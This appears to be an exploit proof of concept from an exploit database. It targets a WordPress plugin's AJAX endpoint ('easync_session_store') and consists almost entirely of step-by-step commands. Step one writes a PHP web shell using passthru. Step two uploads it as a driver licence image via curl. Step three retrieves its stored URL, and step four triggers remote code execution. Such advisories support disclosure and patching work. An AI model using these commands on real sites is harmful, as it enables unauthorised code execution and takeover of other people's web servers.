## https://sploitus.com/exploit?id=WPEX-ID:ECF61D17-8B07-4CB6-93A8-64C2C4FBBE04
1. Create a malicious PHP file:
echo '<?php passthru("id");' > /tmp/evil.php
2. Upload it
curl -H 'Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37' \
-F 'action=easync_session_store' \
-F 'type=car' \
-F 'with_driver=self-driven' \
-F 'driver_license_image2=@/tmp/evil.php' \
'http://127.0.0.1/wp-admin/admin-ajax.php'
3. Determine the location where the shell has been uploaded (the "d_license_image" should contain the URL to it):
curl -H 'Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37' \
'http://127.0.0.1/wp-admin/admin-ajax.php?action=easync_success_and_save'
4. Trigger the payload by accessing the determined URL, e.g: http://127.0.0.1/wp-content/uploads/cff7779bf2268f97c011ece9fd4c9ab0.php